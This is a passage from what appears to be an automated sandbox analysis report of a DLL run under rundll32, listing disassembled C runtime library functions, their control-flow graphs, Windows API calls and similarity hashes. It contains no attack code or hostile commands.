845->850 847->755 848->847 850->829 865->826 867 6f9e6bed-6f9e6c00 call 6f9e7181 865->867 867->843 872 6f9e6c06-6f9e6c12 867->872 872->826 873 6f9e6c18 872->873 873->867
                APIs
                • type_info::operator==.LIBVCRUNTIME ref: 6F9E6BF9
                • ___TypeMatch.LIBVCRUNTIME ref: 6F9E6D07
                • _UnwindNestedFrames.LIBCMT ref: 6F9E6E59
                • CallUnexpected.LIBVCRUNTIME ref: 6F9E6E74
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                • String ID: csm$csm$csm
                • API String ID: 2751267872-393685449
                • Opcode ID: 496e9e35ae3b0188b7da02238e0e7905dafde6b41095736e85f97ef758c65e31
                • Instruction ID: ec3bc2f5668578b73dc31df19e638787bf038e0333bb8f2658d231313e855140
                • Opcode Fuzzy Hash: 496e9e35ae3b0188b7da02238e0e7905dafde6b41095736e85f97ef758c65e31
                • Instruction Fuzzy Hash: 85B19031820319EFCF07CFA4C84099EBBB9FF16314B55456AEA146B2C2D731EA61CB91
                Function 6F9F068D Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 874 6f9f068d-6f9f069e 875 6f9f06a2-6f9f06ad 874->875 876 6f9f06a0 874->876 877 6f9f06af-6f9f06cc call 6f9ede7c 875->877 878 6f9f06d1-6f9f06e4 875->878 876->875 890 6f9f09b6-6f9f09b9 877->890 880 6f9f0739-6f9f073c 878->880 881 6f9f06e6-6f9f0706 call 6f9f09ba 878->881 882 6f9f073e 880->882 883 6f9f0748-6f9f0779 880->883 895 6f9f0708-6f9f070b 881->895 896 6f9f0710-6f9f071c call 6f9fc370 881->896 886 6f9f0744-6f9f0747 882->886 887 6f9f0740-6f9f0742 882->887 888 6f9f077b-6f9f0789 883->888 889 6f9f0799 883->889 886->883 887->883 887->886 892 6f9f078b-6f9f078e 888->892 893 6f9f0790-6f9f0797 888->893 894 6f9f079c-6f9f07a1 889->894 892->894 893->894 897 6f9f07a7-6f9f07ae 894->897 898 6f9f07a3-6f9f07a5 894->898 899 6f9f09b5 895->899 905 6f9f09b3 896->905 906 6f9f0722-6f9f0734 896->906 902 6f9f07bd-6f9f07c8 897->902 903 6f9f07b0-6f9f07ba call 6f9ec320 897->903 901 6f9f07ca-6f9f07d7 898->901 899->890 907 6f9f07d9-6f9f07dc 901->907 908 6f9f07e2-6f9f07f2 901->908 902->901 903->902 905->899 906->905 907->908 910 6f9f08a1-6f9f08a3 907->910 911 6f9f07f5-6f9f0805 908->911 915 6f9f08b5-6f9f08bb 910->915 916 6f9f08a5-6f9f08b3 call 6f9e6180 910->916 913 6f9f0857-6f9f086c call 6f9f0ecd 911->913 914 6f9f0807-6f9f082b call 6f9fc2c0 911->914 913->915 928 6f9f086e-6f9f0874 913->928 926 6f9f082d 914->926 927 6f9f0830-6f9f0853 914->927 920 6f9f08bf-6f9f08ea call 6f9fc2c0 915->920 921 6f9f08bd 915->921 916->915 930 6f9f08ec 920->930 931 6f9f08f6-6f9f08ff 920->931 921->920 926->927 927->911 932 6f9f0855 927->932 933 6f9f0877-6f9f087c 928->933 936 6f9f08ee-6f9f08f0 930->936 937 6f9f08f2-6f9f08f4 930->937 938 6f9f0900-6f9f090c 931->938 932->910 934 6f9f087e-6f9f0881 933->934 935 6f9f0883-6f9f0886 933->935 934->935 939 6f9f0888-6f9f088e 934->939 935->933 936->931 936->937 937->938 940 6f9f09a8-6f9f09af 938->940 941 6f9f0912-6f9f0917 938->941 942 6f9f089e 939->942 943 6f9f0890-6f9f0893 939->943 940->905 944 6f9f091d-6f9f0949 call 6f9fc000 call 6f9fc1e0 941->944 945 6f9f0919-6f9f091b 941->945 942->910 946 6f9f0898-6f9f089c 943->946 947 6f9f0895 943->947 948 6f9f094b-6f9f094d 944->948 953 6f9f0956-6f9f097b call 6f9fc000 call 6f9fc1e0 944->953 945->944 945->948 946->910 947->946 948->940 951 6f9f094f 948->951 951->953 954 6f9f0951-6f9f0954 951->954 957 6f9f097d-6f9f097f 953->957 961 6f9f0988-6f9f09a6 call 6f9fc000 call 6f9fc1e0 953->961 954->953 954->957 957->940 959 6f9f0981 957->959 959->961 962 6f9f0983-6f9f0986 959->962 961->940 962->940 962->961
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: _strrchr
                • String ID:
                • API String ID: 3213747228-0
                • Opcode ID: 5b196b74059184e9b8e0842bd6eede7b04aae286f8f0b9da0e097125ac15f892
                • Instruction ID: baf217140c8dcd65b40ec424e9feedf26838e1ce44582113907c9b87a324178c
                • Opcode Fuzzy Hash: 5b196b74059184e9b8e0842bd6eede7b04aae286f8f0b9da0e097125ac15f892
                • Instruction Fuzzy Hash: 5FB16772A023559FEB158F64CC80BAE7BADEF55310F145196E904AF2D2E370E943CBA0
                Function 6F9E6540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 968 6f9e6540-6f9e6591 call 6f9fc4b0 call 6f9e6500 call 6f9e760c 975 6f9e65ed-6f9e65f0 968->975 976 6f9e6593-6f9e65a5 968->976 977 6f9e65f2-6f9e65ff call 6f9e7790 975->977 978 6f9e6610-6f9e6619 975->978 976->978 979 6f9e65a7-6f9e65be 976->979 983 6f9e6604-6f9e660d call 6f9e6500 977->983 981 6f9e65d4 979->981 982 6f9e65c0-6f9e65ce call 6f9e7730 979->982 985 6f9e65d7-6f9e65dc 981->985 990 6f9e65e4-6f9e65eb 982->990 991 6f9e65d0 982->991 983->978 985->979 988 6f9e65de-6f9e65e0 985->988 988->978 992 6f9e65e2 988->992 990->983 993 6f9e661a-6f9e6623 991->993 994 6f9e65d2 991->994 992->983 995 6f9e665d-6f9e666d call 6f9e7770 993->995 996 6f9e6625-6f9e662c 993->996 994->985 1001 6f9e666f-6f9e667e call 6f9e7790 995->1001 1002 6f9e6681-6f9e669d call 6f9e6500 call 6f9e7750 995->1002 996->995 998 6f9e662e-6f9e663d call 6f9fbe90 996->998 1006 6f9e663f-6f9e6657 998->1006 1007 6f9e665a 998->1007 1001->1002 1006->1007 1007->995
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 6F9E6577
                • ___except_validate_context_record.LIBVCRUNTIME ref: 6F9E657F
                • _ValidateLocalCookies.LIBCMT ref: 6F9E6608
                • __IsNonwritableInCurrentImage.LIBCMT ref: 6F9E6633
                • _ValidateLocalCookies.LIBCMT ref: 6F9E6688
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: 00833ef39707546aafc042727115e06d77210fbbd0a43cf1edf8837cb79cfeb6
                • Instruction ID: 4fea8862b25d08e8bf505b4eb80486591ebf0db6d2677bab8646e0077f54472d
                • Opcode Fuzzy Hash: 00833ef39707546aafc042727115e06d77210fbbd0a43cf1edf8837cb79cfeb6
                • Instruction Fuzzy Hash: BD41B874E20209DBCF11CF68C844A9E7BB5BF46328F108156DA189B3D6DB36E915CF91
                Function 6F9F1703 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1014 6f9f1703-6f9f170f 1015 6f9f17a1-6f9f17a4 1014->1015 1016 6f9f17aa 1015->1016 1017 6f9f1714-6f9f1725 1015->1017 1018 6f9f17ac-6f9f17b0 1016->1018 1019 6f9f1727-6f9f172a 1017->1019 1020 6f9f1732-6f9f174b LoadLibraryExW 1017->1020 1021 6f9f17ca-6f9f17cc 1019->1021 1022 6f9f1730 1019->1022 1023 6f9f174d-6f9f1756 GetLastError 1020->1023 1024 6f9f17b1-6f9f17c1 1020->1024 1021->1018 1026 6f9f179e 1022->1026 1027 6f9f178f-6f9f179c 1023->1027 1028 6f9f1758-6f9f176a call 6f9eee68 1023->1028 1024->1021 1025 6f9f17c3-6f9f17c4 FreeLibrary 1024->1025 1025->1021 1026->1015 1027->1026 1028->1027 1031 6f9f176c-6f9f177e call 6f9eee68 1028->1031 1031->1027 1034 6f9f1780-6f9f178d LoadLibraryExW 1031->1034 1034->1024 1034->1027
                APIs
                • FreeLibrary.KERNEL32(00000000,?,6F9F1812,6F9E7D84,B586E81C,00000000,6F9EC75A,00000000,?,6F9F198B,00000022,FlsSetValue,6F9FF4F8,ccs,6F9EC75A), ref: 6F9F17C4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: api-ms-$ext-ms-
                • API String ID: 3664257935-537541572
                • Opcode ID: 89779a191b62a359c422b201cbe5d7e24261c050e5accc42ee1de3dbfd62f5f0
                • Instruction ID: e40b334bd073041dff6e01b0f17c9760de5542fcaa0258fef270668817dce6d2
                • Opcode Fuzzy Hash: 89779a191b62a359c422b201cbe5d7e24261c050e5accc42ee1de3dbfd62f5f0
                • Instruction Fuzzy Hash: 49210AB1A07611A7EB119B74EC80A8A376DAF43774F250215ED19A72C2D730F953C7D0
                Function 6F9EFE17 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1434 6f9efe17-6f9efe27 1435 6f9efe29-6f9efe3c call 6f9f041e call 6f9f0431 1434->1435 1436 6f9efe41-6f9efe43 1434->1436 1450 6f9f019b 1435->1450 1437 6f9efe49-6f9efe4f 1436->1437 1438 6f9f0183-6f9f0190 call 6f9f041e call 6f9f0431 1436->1438 1437->1438 1442 6f9efe55-6f9efe7e 1437->1442 1456 6f9f0196 call 6f9edef9 1438->1456 1442->1438 1445 6f9efe84-6f9efe8d 1442->1445 1448 6f9efe8f-6f9efea2 call 6f9f041e call 6f9f0431 1445->1448 1449 6f9efea7-6f9efea9 1445->1449 1448->1456 1453 6f9f017f-6f9f0181 1449->1453 1454 6f9efeaf-6f9efeb3 1449->1454 1455 6f9f019e-6f9f01a1 1450->1455 1453->1455 1454->1453 1458 6f9efeb9-6f9efebd 1454->1458 1456->1450 1458->1448 1461 6f9efebf-6f9efed6 1458->1461 1462 6f9eff0b-6f9eff11 1461->1462 1463 6f9efed8-6f9efedb 1461->1463 1467 6f9efee5-6f9efefc call 6f9f041e call 6f9f0431 call 6f9edef9 1462->1467 1468 6f9eff13-6f9eff1a 1462->1468 1465 6f9efedd-6f9efee3 1463->1465 1466 6f9eff01-6f9eff09 1463->1466 1465->1466 1465->1467 1470 6f9eff7e-6f9eff9d 1466->1470 1499 6f9f00b6 1467->1499 1471 6f9eff1e-6f9eff3c call 6f9f047e call 6f9f0444 * 2 1468->1471 1472 6f9eff1c 1468->1472 1474 6f9f0059-6f9f0062 call 6f9f5a73 1470->1474 1475 6f9effa3-6f9effaf 1470->1475 1503 6f9eff3e-6f9eff54 call 6f9f0431 call 6f9f041e 1471->1503 1504 6f9eff59-6f9eff7c call 6f9ef0cf 1471->1504 1472->1471 1488 6f9f0064-6f9f0076 1474->1488 1489 6f9f00d3 1474->1489 1475->1474 1479 6f9effb5-6f9effb7 1475->1479 1479->1474 1484 6f9effbd-6f9effde 1479->1484 1484->1474 1485 6f9effe0-6f9efff6 1484->1485 1485->1474 1490 6f9efff8-6f9efffa 1485->1490 1488->1489 1494 6f9f0078-6f9f0087 GetConsoleMode 1488->1494 1492 6f9f00d7-6f9f00ed ReadFile 1489->1492 1490->1474 1495 6f9efffc-6f9f001f 1490->1495 1497 6f9f00ef-6f9f00f5 1492->1497 1498 6f9f014b-6f9f0156 GetLastError 1492->1498 1494->1489 1500 6f9f0089-6f9f008d 1494->1500 1495->1474 1502 6f9f0021-6f9f0037 1495->1502 1497->1498 1507 6f9f00f7 1497->1507 1505 6f9f016f-6f9f0172 1498->1505 1506 6f9f0158-6f9f016a call 6f9f0431 call 6f9f041e 1498->1506 1501 6f9f00b9-6f9f00c3 call 6f9f0444 1499->1501 1500->1492 1508 6f9f008f-6f9f00a7 ReadConsoleW 1500->1508 1501->1455 1502->1474 1510 6f9f0039-6f9f003b 1502->1510 1503->1499 1504->1470 1517 6f9f00af-6f9f00b5 call 6f9f03d7 1505->1517 1518 6f9f0178-6f9f017a 1505->1518 1506->1499 1514 6f9f00fa-6f9f010c 1507->1514 1515 6f9f00a9 GetLastError 1508->1515 1516 6f9f00c8-6f9f00d1 1508->1516 1510->1474 1520 6f9f003d-6f9f0054 1510->1520 1514->1501 1524 6f9f010e-6f9f0112 1514->1524 1515->1517 1516->1514 1517->1499 1518->1501 1520->1474 1529 6f9f012b-6f9f0138 1524->1529 1530 6f9f0114-6f9f0124 call 6f9efb29 1524->1530 1531 6f9f013a call 6f9efc80 1529->1531 1532 6f9f0144-6f9f0149 call 6f9ef96f 1529->1532 1541 6f9f0127-6f9f0129 1530->1541 1539 6f9f013f-6f9f0142 1531->1539 1532->1539 1539->1541 1541->1501
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5a4999cbd253340700a721d20dd1df6ac67830b14604a817e69a7142f4b4e5a6
                • Instruction ID: 71fc7e5ab318c4dd7e1ec292de8353cefa80c41b500404ca52ab15bb72ccbb9f
                • Opcode Fuzzy Hash: 5a4999cbd253340700a721d20dd1df6ac67830b14604a817e69a7142f4b4e5a6
                • Instruction Fuzzy Hash: D8B1D770E053499FDB12CFA8D840BAE7BB9AF46318F04515AE914972E2D770E943CF50
                Function 6F9E67A3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(00000001,?,6F9E6721,6F9E51C4,6F9E4B74,?,6F9E4DAC,?,00000001,?,?,00000001,?,6FA04240,0000000C,6F9E4EA5), ref: 6F9E67B1
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F9E67BF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F9E67D8
                • SetLastError.KERNEL32(00000000,6F9E4DAC,?,00000001,?,?,00000001,?,6FA04240,0000000C,6F9E4EA5,?,00000001,?), ref: 6F9E682A
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: dfdf7fe836fb0ec0733f181b63a26d79ef79237d028ecca6ccee01f88ff9caf5
                • Instruction ID: b1f083cb3b3d3312ef3f095ca282bb96336c5217fa9d947b44f3b8a2ab93a7e8
                • Opcode Fuzzy Hash: dfdf7fe836fb0ec0733f181b63a26d79ef79237d028ecca6ccee01f88ff9caf5
                • Instruction Fuzzy Hash: 7B01D43211EB125EAA171AB46C946472B59EF5777C730833EE720453D1EF12D862C18A
                Function 6F9F3DF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                Download Yara Rule
                Strings
                • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F9F3E14
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID: C:\Windows\SysWOW64\rundll32.exe
                • API String ID: 0-2837366778
                • Opcode ID: 1e3172428df33662d62a9d4dc582287f17cb59eca170ea0b85102df59a552e79
                • Instruction ID: 5b7a7f9e1679c946130062c04525eb99cf12bfac563d28d90b35c0b7e1f6adaa
                • Opcode Fuzzy Hash: 1e3172428df33662d62a9d4dc582287f17cb59eca170ea0b85102df59a552e79
                • Instruction Fuzzy Hash: 0021F03160A205AFDB129F74DC41D5B77ADAF113687004614EE169B2D1E738FC52CBA2
                Function 6F9EE429 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B5FBC098,6F9EC75A,?,00000000,6F9FC710,000000FF,?,6F9EE3C3,B586E81C,?,6F9EE397,?), ref: 6F9EE45E
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F9EE470
                • FreeLibrary.KERNEL32(00000000,?,00000000,6F9FC710,000000FF,?,6F9EE3C3,B586E81C,?,6F9EE397,?), ref: 6F9EE492
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 5b65d13e5c707de824d2b348650507c48963b1824bdf2c75f02eb7080dee24d3
                • Instruction ID: 6c8dc8bb744076d8706710171ffb484282acbc6f1ef7774dc40ee4af8b8f184e
                • Opcode Fuzzy Hash: 5b65d13e5c707de824d2b348650507c48963b1824bdf2c75f02eb7080dee24d3
                • Instruction Fuzzy Hash: 6501A231905A1ABBEB129F40CC08FAE7BB9FF45764F004626F921A23C0DB34D905CB90
                Function 6F9F8CF4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                Download Yara Rule
                APIs
                • __alloca_probe_16.LIBCMT ref: 6F9F8D79
                • __alloca_probe_16.LIBCMT ref: 6F9F8E42
                • __freea.LIBCMT ref: 6F9F8EA9
                  • Part of subcall function 6F9F047E: RtlAllocateHeap.KERNEL32(00000000,6F9F4371,7D32887D,?,6F9F4371,00000220,?,6F9E1775,7D32887D), ref: 6F9F04B0
                • __freea.LIBCMT ref: 6F9F8EBC
                • __freea.LIBCMT ref: 6F9F8EC9
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: __freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 1423051803-0
                • Opcode ID: 67e20e05562b1584d2e98a8c66e9abd3ee7a267363bf8e2d0265f66a12635e93
                • Instruction ID: c7cd2159103a40b8d5135be626dd784ed37a7ccee5ac8af7a2f17fad64ecdd1f
                • Opcode Fuzzy Hash: 67e20e05562b1584d2e98a8c66e9abd3ee7a267363bf8e2d0265f66a12635e93
                • Instruction Fuzzy Hash: 96510672A06206AFEB5A5F66CC84EEB36ADEF95314B10052DFD15D61D0E730EC52C7A0
                Function 6F9E78B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6F9E7863,00000000,?,00000001,?,?,?,6F9E7952,00000001,FlsFree,6F9FDCE0,FlsFree), ref: 6F9E78BF
                • GetLastError.KERNEL32(?,6F9E7863,00000000,?,00000001,?,?,?,6F9E7952,00000001,FlsFree,6F9FDCE0,FlsFree,00000000,?,6F9E6878), ref: 6F9E78C9
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6F9E78F1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID: api-ms-
                • API String ID: 3177248105-2084034818
                • Opcode ID: b47c339dd91411f1bbecaed53c69ccd36df81b0fa396bc8dbd65172b8f2ba03a
                • Instruction ID: e0995ae150704eadd01931741c95366524bb6e7fc4aa82250b39d65878c4bd59
                • Opcode Fuzzy Hash: b47c339dd91411f1bbecaed53c69ccd36df81b0fa396bc8dbd65172b8f2ba03a
                • Instruction Fuzzy Hash: EEE04F3024830AB7FF061E60EC45B493F6ABF11B50F144431FA0DE81D2EBA1E462DA8A
                Function 6F9F25E6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetConsoleOutputCP.KERNEL32(B5FBC098,00000000,00000000,?), ref: 6F9F2649
                  • Part of subcall function 6F9F4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F8E9F,?,00000000,-00000008), ref: 6F9F49A6
                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F9F289B
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F9F28E1
                • GetLastError.KERNEL32 ref: 6F9F2984
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                • String ID:
                • API String ID: 2112829910-0
                • Opcode ID: fe81266302eadc7dbad4a0eb118a1f72f7f336948244fc018ea67c52c7bcdbaf
                • Instruction ID: 88a3865aec50a2153264f08ea284437b8430fd06ee3aea968d8feab9cd1998f0
                • Opcode Fuzzy Hash: fe81266302eadc7dbad4a0eb118a1f72f7f336948244fc018ea67c52c7bcdbaf
                • Instruction Fuzzy Hash: 58D16B75D052899FCB05CFA8C980AEDBBB9FF09314F28412AE555EB391D630E952CB50
                Function 6F9E6883 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: b97839c47a9caff3eadd396ee411979d5a0aa84b8b7e82d5c6d866617396aefd
                • Instruction ID: 969753698cff31dcd0520bd5c325d6c23ab26ae89bc23608c0f8d1ee191ba1e7
                • Opcode Fuzzy Hash: b97839c47a9caff3eadd396ee411979d5a0aa84b8b7e82d5c6d866617396aefd
                • Instruction Fuzzy Hash: 4C51E372A24702DFEB2A8F15D940BAA73B9FF92314F10452EDB514B2D1EB31E880C751
                Function 6F9F3694 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 6F9F4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F8E9F,?,00000000,-00000008), ref: 6F9F49A6
                • GetLastError.KERNEL32 ref: 6F9F36F8
                • __dosmaperr.LIBCMT ref: 6F9F36FF
                • GetLastError.KERNEL32(?,?,?,?), ref: 6F9F3739
                • __dosmaperr.LIBCMT ref: 6F9F3740
                Memory Dump Source
